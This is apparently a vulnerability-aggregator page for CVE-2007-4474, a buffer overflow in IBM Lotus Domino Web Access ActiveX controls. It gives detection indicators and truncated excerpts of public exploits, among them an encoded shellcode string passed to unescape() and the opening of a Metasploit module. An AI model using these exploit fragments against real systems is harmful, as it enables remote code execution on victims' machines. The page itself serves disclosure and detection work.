CVE-2007-4474
published 2007-12-27CVE-2007-4474: Multiple stack-based buffer overflows in the IBM Lotus Domino Web Access ActiveX control, as provided by inotes6.dll, inotes6w.dll, dwa7.dll, and dwa7w.dll, in…
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
44.18%
98.6th percentile
Multiple stack-based buffer overflows in the IBM Lotus Domino Web Access ActiveX control, as provided by inotes6.dll, inotes6w.dll, dwa7.dll, and dwa7w.dll, in Domino 6.x and 7.x allow remote attackers to execute arbitrary code, as demonstrated by an overflow from a long General_ServerName property value when calling the InstallBrowserHelperDll function in the Upload Module in the dwa7.dwa7.1 control in dwa7w.dll 7.0.34.1.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | domino_web_access | — | — |
| ibm | lotus_domino_web_access | — | — |
| ibm | lotus_domino_web_access | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0x0C0C0C0C (heap spray return address, Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0)
bytes↗
Alpha2-encoded shellcode prefix: %u03eb%ueb59%ue805%ufff8%uffff (win32_exec calc.exe)
bytes↗
Alpha2-encoded shellcode prefix: %u03eb%ueb59%ue805%ufff8%uffff (win32_bind LPORT=4444)
- →Detect ActiveX instantiation of the vulnerable ProgID 'dwa7.dwa7.1' in browser context, which corresponds to the vulnerable dwa7w.dll Upload Module control. ↗
- →Monitor for heap spray patterns using the 0x0C0C0C0C address in browser processes (iexplore.exe) targeting Windows XP with IE 6/7, indicative of exploitation of this vulnerability. ↗
- →Detect JavaScript heap spray using unescape() with large NOP sleds (%u9090%u9090) combined with Alpha2-encoded shellcode (%u03eb%ueb59%ue805%ufff8%uffff) in HTML pages, a hallmark of this exploit's delivery mechanism. ↗
- →Alert on calls to InstallBrowserHelperDll from the IBM Lotus Domino Web Access ActiveX controls (inotes6.dll, inotes6w.dll, dwa7.dll, dwa7w.dll) with unusually long string arguments passed to General_ServerName. ↗
- ·The Metasploit module randomizes all JavaScript variable names on each request, so static variable-name-based signatures will not reliably detect this exploit. ↗
- ·The exploit targets only Windows XP SP0-SP2 with IE 6.0 SP0-2 and IE 7.0 English; the heap spray return address 0x0C0C0C0C is platform-specific and may not apply to other OS/browser combinations. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM Lotus Domino Web Access Upload Module - Remote Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2007-4474 IBM Lotus Domino Web Access Upload Module - Remote Buffer Overflow (Metasploit)
IBM Lotus Domino Web Access Upload Module - Remote Buffer Overflow (Metasploit)
---
##
# $Id: ibmlotusdomino_dwa_uploadmodule.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IBM Lotus Domino Web Access Upload Module Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.
By sending an overly long string to the "General_ServerName()" property located
in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute
Exploit-DB
IBM Domino Web Access Upload Module - Overwrite (SEH)
exploitdb·2008-02-13·CVSS 9.3
CVE-2007-4474 [CRITICAL] IBM Domino Web Access Upload Module - Overwrite (SEH)
IBM Domino Web Access Upload Module - Overwrite (SEH)
---
IBM Domino Web Access Upload Module Universal BoF Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u59
Exploit-DB
IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Remote Buffer Overflow
exploitdb·2007-12-30·CVSS 9.3
CVE-2007-4474 [CRITICAL] IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Remote Buffer Overflow
IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Remote Buffer Overflow
---
IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit
function Check() {
var buf = 'A';
while (buf.length
Unable to create object
# milw0rm.com [2007-12-30]
Exploit-DB
IBM Domino Web Access Upload Module - 'dwa7w.dll' Remote Buffer Overflow
exploitdb·2007-12-30·CVSS 9.3
CVE-2007-4474 [CRITICAL] IBM Domino Web Access Upload Module - 'dwa7w.dll' Remote Buffer Overflow
IBM Domino Web Access Upload Module - 'dwa7w.dll' Remote Buffer Overflow
---
IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
function Check() {
var buf = unescape("%u4141");
while (buf.length
Unable to create object
# milw0rm.com [2007-12-30]
Metasploit
IBM Lotus Domino Web Access Upload Module Buffer Overflow
metasploit
IBM Lotus Domino Web Access Upload Module Buffer Overflow
IBM Lotus Domino Web Access Upload Module Buffer Overflow
This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the "General_ServerName()" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059233.htmlhttp://osvdb.org/40954http://secunia.com/advisories/28184http://www.kb.cert.org/vuls/id/963889http://www.securityfocus.com/bid/26972http://www.securitytracker.com/id?1019138http://www.vupen.com/english/advisories/2007/4296https://exchange.xforce.ibmcloud.com/vulnerabilities/39175https://www.exploit-db.com/exploits/4818https://www.exploit-db.com/exploits/4820https://www.exploit-db.com/exploits/5111http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059233.htmlhttp://osvdb.org/40954http://secunia.com/advisories/28184http://www.kb.cert.org/vuls/id/963889http://www.securityfocus.com/bid/26972http://www.securitytracker.com/id?1019138http://www.vupen.com/english/advisories/2007/4296https://exchange.xforce.ibmcloud.com/vulnerabilities/39175https://www.exploit-db.com/exploits/4818https://www.exploit-db.com/exploits/4820https://www.exploit-db.com/exploits/5111
2007-12-27
Published